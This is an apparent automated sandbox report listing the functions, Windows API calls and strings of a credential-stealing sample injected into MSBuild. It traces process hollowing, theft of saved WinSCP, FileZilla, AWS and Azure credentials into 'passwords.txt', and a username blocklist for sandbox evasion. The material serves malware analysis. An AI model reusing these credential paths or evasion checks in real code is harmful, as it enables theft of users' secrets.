Part of subcall function 0041BC7F: malloc.MSVCRT ref: 0041BCB9
Part of subcall function 0041BC7F: lstrcpyA.KERNEL32(00000000,?), ref: 0041BCC4

malloc.MSVCRT ref: 0041CD19

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: malloc$lstrcpylstrlen
String ID:
API String ID: 2974738957-0
Opcode ID: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
Instruction ID: fcaced55c1c361c3e27715ea7ae3a17afdad1615e326a9d39dd71d0aa4f9bcfc
Opcode Fuzzy Hash: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
Instruction Fuzzy Hash: 6BF0F0721412166BDB206F6AEC8098BBB94EB457A0F150037FD0997351EA38CC4086F9

Function 00418753 Relevance: 1.7, APIs: 1, Instructions: 154libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,004185D2), ref: 0041898D

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 98b88b5f96dc66c065c06141136ba5df242bfcb15761572c331c610d89b40f79
Instruction ID: 199c42d56f0628ccab12840d69b6f02f13cfb0cf7a8249375453f6caf445ef8e
Opcode Fuzzy Hash: 98b88b5f96dc66c065c06141136ba5df242bfcb15761572c331c610d89b40f79
Instruction Fuzzy Hash: 2B7106B5910312AFEF1ADF60FD488243BA7F70874BF11A426E91582270EB374A64EF55

Function 00410CC0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 00410CDF

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5c7da9d774efdaa0fdd76bf82abc7e5b87a86e22502ea334df05fc1f96782480
Instruction ID: 829b10f54598a7ff4258e043d4963b9d7c9dabd005c17a1734c4fecc941c9070
Opcode Fuzzy Hash: 5c7da9d774efdaa0fdd76bf82abc7e5b87a86e22502ea334df05fc1f96782480
Instruction Fuzzy Hash: 22F031B2900218BBDF14DFE59C059BF77BCAB0C716F001095F941E2180E6399A80D775

Function 0041C440 Relevance: 1.3, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0041C451

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: f9060b93a179226b6bcb6403471e41fabc2e13e5dadf3889cf2d7472838e218b
Instruction ID: b821a3ed68e39ced0a1ee7d52ccadc00ba9e28cef2c83c113185a37151cab313
Opcode Fuzzy Hash: f9060b93a179226b6bcb6403471e41fabc2e13e5dadf3889cf2d7472838e218b
Instruction Fuzzy Hash: A221F6742007108FC320DF6ED495996B7F1FF49314B14486EEA8A8B722D776E880CB15

Non-executed Functions

Function 0040F54A Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 130injectionthreadmemoryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040F57C
GetThreadContext.KERNEL32(?,00000000), ref: 0040F5C4
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040F5E2
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0040F5F8
WriteProcessMemory.KERNEL32(?,00000000,a-A,?,00000000), ref: 0040F627
WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0040F65D
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040F684
SetThreadContext.KERNEL32(?,00000000), ref: 0040F696

Strings

C:\Windows\System32\cmd.exe, xrefs: 0040F59B
a-A, xrefs: 0040F550, 0040F620

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: MemoryProcess$Write$ContextThread$AllocReadVirtual_memset
String ID: C:\Windows\System32\cmd.exe$a-A
API String ID: 1852632844-431432405
Opcode ID: c39c767b4fc440431594be31adcdd6aa0aa839711508083770b6d10c9d5435bd
Instruction ID: 1dbec0a9bd52493e5c3d537ba7c19bf6326571b571cf52f9f0c3be7ee7289f1e
Opcode Fuzzy Hash: c39c767b4fc440431594be31adcdd6aa0aa839711508083770b6d10c9d5435bd
Instruction Fuzzy Hash: EF413872A00208AFEB11DFA4DC85FAAB7B9FF48705F144475FA01E6161E776AD448B24

Function 00415142 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004151C2
_memset.LIBCMT ref: 004151E5
GetDriveTypeA.KERNEL32(?), ref: 004151EE

Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D4F
Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D60
Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414E28

Strings

%DRIVE_REMOVABLE%, xrefs: 00415215
*%DRIVE_REMOVABLE%*, xrefs: 0041518F
*%DRIVE_FIXED%*, xrefs: 0041515E
%DRIVE_FIXED%, xrefs: 00415230

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: _memset$Drive$LogicalStringsType
String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
API String ID: 2132072831-147700698
Opcode ID: 25dee723edb154986e326efe7e223fa8c1d01518070de25a6a7738e7c8dc9afa
Instruction ID: ea4f15970c6a5d4b45be7a2176528fb80d3ae30a0f48c86a9c416c7322ab13a3
Opcode Fuzzy Hash: 25dee723edb154986e326efe7e223fa8c1d01518070de25a6a7738e7c8dc9afa
Instruction Fuzzy Hash: 3C512CB190021CAFDF219FA1CC85BDA7BB9FB05304F1041AAEA49A7111EB355E89CF59

Function 0040180D Relevance: 12.1, APIs: 8, Instructions: 68sleepthreadCOMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32(00000000,00000001,80000000), ref: 00401823
SetThreadDesktop.USER32(00000000), ref: 0040182A
GetCursorPos.USER32(?), ref: 0040183A
Sleep.KERNEL32(000003E8), ref: 0040184A
GetCursorPos.USER32(?), ref: 00401859
Sleep.KERNEL32(00002710), ref: 0040186B
Sleep.KERNEL32(000003E8), ref: 00401870
GetCursorPos.USER32(?), ref: 0040187F

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CursorSleep$Desktop$InputOpenThread
String ID:
API String ID: 3283940658-0
Opcode ID: f5ba76f92f65e2804661e56e76115090119226def0e33c1286c40128a66e7fa7
Instruction ID: 6ce610161f310883e20b46de56f80fe1d7998de54b5bc585690095a2dc5f2f67
Opcode Fuzzy Hash: f5ba76f92f65e2804661e56e76115090119226def0e33c1286c40128a66e7fa7
Instruction Fuzzy Hash: C9112E32E00209EBEB10EBA4CD89AAF77B9AF44301F644877D501B21A0D7789B41CB58

Function 0042B1EC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0042B855,?,00428606,?,000000BC,?), ref: 0042B22B
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0042B855,?,00428606,?,000000BC,?), ref: 0042B254
GetACP.KERNEL32(?,?,0042B855,?,00428606,?,000000BC,?), ref: 0042B268

Strings

OCP, xrefs: 0042B20C
ACP, xrefs: 0042B1FB

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: dabdef429acf28403b0f87105750c87aa7dd444468e3f7da184b66417ca4622f
Instruction ID: 1d8a24c55ad27a2629b7a766668cf871eddc3622aa3f9d7e0ae662acd3c2ea88
Opcode Fuzzy Hash: dabdef429acf28403b0f87105750c87aa7dd444468e3f7da184b66417ca4622f
Instruction Fuzzy Hash: F101D831701716FAEB219B51FC4AF5F73A8DB45368F60009AF001E0581D778DA4192AD

Function 0041D12A Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0041D562
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041D577
UnhandledExceptionFilter.KERNEL32(0043332C), ref: 0041D582
GetCurrentProcess.KERNEL32(C0000409), ref: 0041D59E
TerminateProcess.KERNEL32(00000000), ref: 0041D5A5

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 81b757bedadb6aa414f3cbb5558a59dfea264c2a9b68c96a8667cab582a7df29
Instruction ID: 4bba9ff048c9058af47a45dce311be71d9a10e9393078c90d81800ef8cb4dbee
Opcode Fuzzy Hash: 81b757bedadb6aa414f3cbb5558a59dfea264c2a9b68c96a8667cab582a7df29
Instruction Fuzzy Hash: B621CDB4C01701DFD724DFA4F949A443BB4BF08316F10916AF41887262E7B4D9818F5E

Function 0040E186 Relevance: 44.1, APIs: 11, Strings: 14, Instructions: 325registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040E1B7
_memset.LIBCMT ref: 0040E1D7
_memset.LIBCMT ref: 0040E1E8
_memset.LIBCMT ref: 0040E1F9
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E22D
RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E25E
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E2BD
RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,004368E7), ref: 0040E379
RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0040E3D9

Strings

Host: , xrefs: 0040E32A
Login: , xrefs: 0040E459
Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 0040E2B3
HostName, xrefs: 0040E367
PortNumber, xrefs: 0040E3BD
passwords.txt, xrefs: 0040E662
Soft: WinSCP, xrefs: 0040E2FE
Password: , xrefs: 0040E529
Password, xrefs: 0040E515
Security, xrefs: 0040E253
UserName, xrefs: 0040E496
Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040E20B
UseMasterPassword, xrefs: 0040E24E
:22, xrefs: 0040E42D

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: _memset$Value$Open
String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
API String ID: 2191171593-2798830873
Opcode ID: 4eaab8354fff006c774e5a3a11a8fc4062ced311967a4d7608afb3132e7bbd75
Instruction ID: ab712d79911a6534e16ca2c8d51643d97c9570b95301d2e418567ee179d90524
Opcode Fuzzy Hash: 4eaab8354fff006c774e5a3a11a8fc4062ced311967a4d7608afb3132e7bbd75
Instruction Fuzzy Hash: 56D1D6B195012DAADF21EB91DC42BD9B778AF04308F5018EBA508B3151DA747FC9CFA5

Function 0040DCA0 Relevance: 42.4, APIs: 28, Instructions: 399memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040DB7F: lstrlenA.KERNEL32(?,75AA5460,?,00000000), ref: 0040DBBB
Part of subcall function 0040DB7F: strchr.MSVCRT ref: 0040DBCD

HeapFree.KERNEL32(00000000), ref: 0040DD27
strcpy_s.MSVCRT ref: 0040DD43
HeapFree.KERNEL32(00000000), ref: 0040DD62
HeapFree.KERNEL32(00000000), ref: 0040DD9A
HeapFree.KERNEL32(00000000), ref: 0040DDC4
strcpy_s.MSVCRT ref: 0040DDDA
HeapFree.KERNEL32(00000000), ref: 0040DDF3
HeapFree.KERNEL32(00000000), ref: 0040DE18
HeapFree.KERNEL32(00000000), ref: 0040DE42
strcpy_s.MSVCRT ref: 0040DE52
HeapFree.KERNEL32(00000000), ref: 0040DE6B
HeapFree.KERNEL32(00000000), ref: 0040DE9A
HeapFree.KERNEL32(00000000), ref: 0040DECA
strcpy_s.MSVCRT ref: 0040DEDD
HeapFree.KERNEL32(00000000), ref: 0040DEF6
lstrlenA.KERNEL32(00000000), ref: 0040DEFF
lstrlenA.KERNEL32(00000000), ref: 0040DF34

Part of subcall function 0040F128: std::_Xinvalid_argument.LIBCPMT ref: 0040F13E

strcpy_s.MSVCRT ref: 0040DF75
HeapFree.KERNEL32(00000000), ref: 0040DFA8
lstrlenA.KERNEL32(?), ref: 0040DFAD
HeapFree.KERNEL32(00000000), ref: 0040DFDE
strcpy_s.MSVCRT ref: 0040DFEC
HeapFree.KERNEL32(00000000), ref: 0040E000
HeapFree.KERNEL32(00000000), ref: 0040E03C
strcpy_s.MSVCRT ref: 0040E065
HeapFree.KERNEL32(00000000), ref: 0040E07E
HeapFree.KERNEL32(00000000), ref: 0040E129
HeapFree.KERNEL32(00000000), ref: 0040E17A

Part of subcall function 0040DB7F: strchr.MSVCRT ref: 0040DBF2
Part of subcall function 0040DB7F: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC14
Part of subcall function 0040DB7F: strcpy_s.MSVCRT ref: 0040DC6F

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: FreeHeap$strcpy_s$lstrlen$strchr$Xinvalid_argumentstd::_
String ID:
API String ID: 219400098-0
Opcode ID: 944c7dbbb483e652ea0c5082bda78fe99dba96f91c80018fac581aa229666c1c
Instruction ID: 55d57addeb693bec13dd2aca0e3f8bc9cd2252af75e58958267656c534a8cbc3
Opcode Fuzzy Hash: 944c7dbbb483e652ea0c5082bda78fe99dba96f91c80018fac581aa229666c1c
Instruction Fuzzy Hash: 36E14C72C00219ABEF249FF1DC48ADEBF79BF08305F1454AAF115B3152EA3A59849F54

Function 00424C37 Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00424C3F
__mtterm.LIBCMT ref: 00424C4B

Part of subcall function 0042490A: DecodePointer.KERNEL32(FFFFFFFF), ref: 0042491B
Part of subcall function 0042490A: TlsFree.KERNEL32(FFFFFFFF), ref: 00424935

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00424C61
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00424C6E
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00424C7B
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00424C88
TlsAlloc.KERNEL32 ref: 00424CD8
TlsSetValue.KERNEL32(00000000), ref: 00424CF3
__init_pointers.LIBCMT ref: 00424CFD
EncodePointer.KERNEL32 ref: 00424D0E
EncodePointer.KERNEL32 ref: 00424D1B
EncodePointer.KERNEL32 ref: 00424D28
EncodePointer.KERNEL32 ref: 00424D35
DecodePointer.KERNEL32(Function_00024A8E), ref: 00424D56
__calloc_crt.LIBCMT ref: 00424D6B
DecodePointer.KERNEL32(00000000), ref: 00424D85
__initptd.LIBCMT ref: 00424D90
GetCurrentThreadId.KERNEL32 ref: 00424D97

Strings

FlsSetValue, xrefs: 00424C70
FlsAlloc, xrefs: 00424C5B
FlsGetValue, xrefs: 00424C63
FlsFree, xrefs: 00424C7D
KERNEL32.DLL, xrefs: 00424C3A

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3732613303-3819984048
Opcode ID: c4b24359c7556117875d4a9d0ed065821010c0f35d81486e563c5d9150432d9a
Instruction ID: 94530a44bd353d5e48263630fbc58cc49e13d953e031ca61b59d9614a8241a7b
Opcode Fuzzy Hash: c4b24359c7556117875d4a9d0ed065821010c0f35d81486e563c5d9150432d9a
Instruction Fuzzy Hash: CC316B31E013649ACB22AF7ABC0860A3BA4EF84762B51063BE410D32B1DFB8C440DF4D

Function 00401927 Relevance: 36.8, APIs: 2, Strings: 19, Instructions: 56stringCOMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 00401A13
lstrcmpiA.KERNEL32(0043AC84,?), ref: 00401A2E

Strings

maltest, xrefs: 004019D7
WDAGUtilityAccount, xrefs: 004019FF
Miller, xrefs: 00401991
user, xrefs: 004019B9
CurrentUser, xrefs: 0040194B
test user, xrefs: 004019E1
Emily, xrefs: 0040195F
Sand box, xrefs: 00401955
John Doe, xrefs: 004019F5
sandbox, xrefs: 004019C3
timmy, xrefs: 004019AF
HAPUBWS, xrefs: 00401969
Johnson, xrefs: 00401987
milozs, xrefs: 0040199B
Hong Lee, xrefs: 00401973
IT-ADMIN, xrefs: 0040197D
virus, xrefs: 004019EB
Peter Wilson, xrefs: 004019A5
malware, xrefs: 004019CD

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: NameUserlstrcmpi
String ID: CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sand box$WDAGUtilityAccount$maltest$malware$milozs$sandbox$test user$timmy$user$virus
API String ID: 542268695-1784693376
Opcode ID: da99fce13d188c8d449195af6028c632b9155eeec286f17b5d3ae48a6bd12366
Instruction ID: d1bae68e67e499abaef637c9412b49fd07aa939d7eda53f7808c85b94d013073
Opcode Fuzzy Hash: da99fce13d188c8d449195af6028c632b9155eeec286f17b5d3ae48a6bd12366
Instruction Fuzzy Hash: FD2103B194126C8BCB60CF15DD486DDB7B4BB59309F00B1DAD489AA250C7B84FD9CF49

Function 0041B983 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,74DE83C0,00000000,0041C66E,?), ref: 0041B988
StrCmpCA.SHLWAPI(74DE83C0,0043613C), ref: 0041B9B6
StrCmpCA.SHLWAPI(74DE83C0,.zip), ref: 0041B9C6
StrCmpCA.SHLWAPI(74DE83C0,.zoo), ref: 0041B9D2
StrCmpCA.SHLWAPI(74DE83C0,.arc), ref: 0041B9DE
StrCmpCA.SHLWAPI(74DE83C0,.lzh), ref: 0041B9EA
StrCmpCA.SHLWAPI(74DE83C0,.arj), ref: 0041B9F6
StrCmpCA.SHLWAPI(74DE83C0,.gz), ref: 0041BA02
StrCmpCA.SHLWAPI(74DE83C0,.tgz), ref: 0041BA0E

Strings

.zip, xrefs: 0041B9C0
.lzh, xrefs: 0041B9E4
.zoo, xrefs: 0041B9CC
.arc, xrefs: 0041B9D8
.gz, xrefs: 0041B9FC
.arj, xrefs: 0041B9F0
.tgz, xrefs: 0041BA08

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
API String ID: 1659193697-51310709
Opcode ID: 54ae333f8b5274885e17379ca82bd682d21753aa1aef1686f1ee84574de7c63d
Instruction ID: 04d37d8bf72ca36d8f635762d850a2ddb5f423679fb0dd0bb54afd8eff972df8
Opcode Fuzzy Hash: 54ae333f8b5274885e17379ca82bd682d21753aa1aef1686f1ee84574de7c63d
Instruction Fuzzy Hash: D601B571691367B15A2226316E41FBF1E6CCD86F80F15202BED00E2289EB4C9C8356FE

Function 004164BD Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 114COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004164E2
_memset.LIBCMT ref: 00416556
_memset.LIBCMT ref: 004165CA
_memset.LIBCMT ref: 0041663E

Strings

\.azure\, xrefs: 00416512
Azure\.aws, xrefs: 004165A5
*.*, xrefs: 004165AA
\.IdentityService\, xrefs: 004165FD
Azure\.azure, xrefs: 00416531
\.aws\, xrefs: 00416589
msal.cache, xrefs: 0041661E
*.*, xrefs: 00416536
Azure\.IdentityService, xrefs: 00416619

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: _memset
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 2102423945-974132213
Opcode ID: 1248a50cc083a135fbf0f89df80aa356fe011ce7e916853b59fe57bee07ce889
Instruction ID: 84896bacdfb64059cc425482cd21a2e289ba5d14c04e476c3e3a3401a8d995fd
Opcode Fuzzy Hash: 1248a50cc083a135fbf0f89df80aa356fe011ce7e916853b59fe57bee07ce889
Instruction Fuzzy Hash: E841C671D4021C7BDB14EB60EC47FDD7378AB09304F6044AAB605A7090EABDAB888F58

Function 00414CC8 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 297stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00414D4F
_memset.LIBCMT ref: 00414D60
_memset.LIBCMT ref: 00414E28
strtok_s.MSVCRT ref: 00414E82
_memset.LIBCMT ref: 00414E94
strtok_s.MSVCRT ref: 00414EC2
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414FB6
strtok_s.MSVCRT ref: 00414FE7

Strings

%s\%s, xrefs: 00414E10
%s\*.*, xrefs: 00414D10
%s\%s, xrefs: 00414DBC
%s\%s\%s, xrefs: 00414DF9

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: _memset$strtok_s$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
API String ID: 2378718607-332874205
Opcode ID: cdfd22d0e11b45c9efbff38089d8f3840ce91f29f908b9a5275c7c26593a396f
Instruction ID: 9768ecd297fb6e20fca964dbbce2c4256e5a8c732881b8487d541fa13927e408
Opcode Fuzzy Hash: cdfd22d0e11b45c9efbff38089d8f3840ce91f29f908b9a5275c7c26593a396f
Instruction Fuzzy Hash: 95C12AB1E0021AABCF22EF60DC45AEE777DAF08305F0140A6FA09A3151DB399F858F55

Function 0040E6CF Relevance: 21.3, APIs: 2, Strings: 10, Instructions: 289stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0040E77E

Part of subcall function 00416FA7: CreateThread.KERNEL32(00000000,00000000,00416ED6,?,00000000,00000000), ref: 00417046
Part of subcall function 00416FA7: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 0041704E

Strings

Password: , xrefs: 0040E9AE
Host: , xrefs: 0040E954
<Host>, xrefs: 0040E7D9
Soft: FileZilla, xrefs: 0040E948
<User>, xrefs: 0040E851
<Port>, xrefs: 0040E818
<Pass encoding="base64">, xrefs: 0040E88A
Login: , xrefs: 0040E98C
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040E71F
passwords.txt, xrefs: 0040EA4D

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleThreadWaitstrtok_s
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
API String ID: 2687659135-935134978
Opcode ID: 50749591bd779b1798e59f7b5f1774cbe48aab8804e91c0819f0dfcfdefeffec
Instruction ID: 14048a2b419fde31a88832429adc402d622cfb8f20e2d9bcd7eb6ceae992149e
Opcode Fuzzy Hash: 50749591bd779b1798e59f7b5f1774cbe48aab8804e91c0819f0dfcfdefeffec
Instruction Fuzzy Hash: E5A18572A40219BBCF01FBA1DD4AADD7775AF08305F105426F501F30A1EBB9AE498F99

Function 00428C34 Relevance: 18.1, APIs: 12, Instructions: 95COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00428C4D

Part of subcall function 00424192: Sleep.KERNEL32(00000000,?), ref: 004241BA

__calloc_crt.LIBCMT ref: 00428C71
_free.LIBCMT ref: 00428C7F
__calloc_crt.LIBCMT ref: 00428C8D
_free.LIBCMT ref: 00428C9D
_free.LIBCMT ref: 00428CA3
__copytlocinfo_nolock.LIBCMT ref: 00428CB2
__setlocale_nolock.LIBCMT ref: 00428CBF
_free.LIBCMT ref: 00428CD8
__setmbcp_nolock.LIBCMT ref: 00428CEA
_free.LIBCMT ref: 00428CF8
_free.LIBCMT ref: 00428D0C

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
String ID:
API String ID: 3833677464-0
Opcode ID: 784abcef5afcd593a1ca4234ae08e44cf487d9407e5e4ef41eebf28f0038ada9
Instruction ID: 43a3aa265a383408f17471e0f34179b95454a98dc0d8d6604ebfa51982022fc1
Opcode Fuzzy Hash: 784abcef5afcd593a1ca4234ae08e44cf487d9407e5e4ef41eebf28f0038ada9
Instruction Fuzzy Hash: FB21043130A6309ADB21BF27F802A5EB7E4EF91754F60842FF48456251EF399850CA6C

Function 004015E6 Relevance: 18.0, APIs: 12, Instructions: 50windowmemoryregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 004015BC: GetProcessHeap.KERNEL32(00000008,000000FF), ref: 004015C6
Part of subcall function 004015BC: HeapAlloc.KERNEL32(00000000), ref: 004015CD

MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 00401606
GetLastError.KERNEL32 ref: 0040160C
SetCriticalSectionSpinCount.KERNEL32(00000000,00000000), ref: 00401614
GetWindowContextHelpId.USER32(00000000), ref: 0040161B
GetWindowLongW.USER32(00000000,00000000), ref: 00401623
RegisterClassW.USER32(00000000), ref: 0040162A
IsWindowVisible.USER32(00000000), ref: 00401631
ConvertDefaultLocale.KERNEL32(00000000), ref: 00401638
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401644
IsDialogMessageW.USER32(00000000,00000000), ref: 0040164C
GetProcessHeap.KERNEL32(00000000,?), ref: 00401656
HeapFree.KERNEL32(00000000), ref: 0040165D

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin
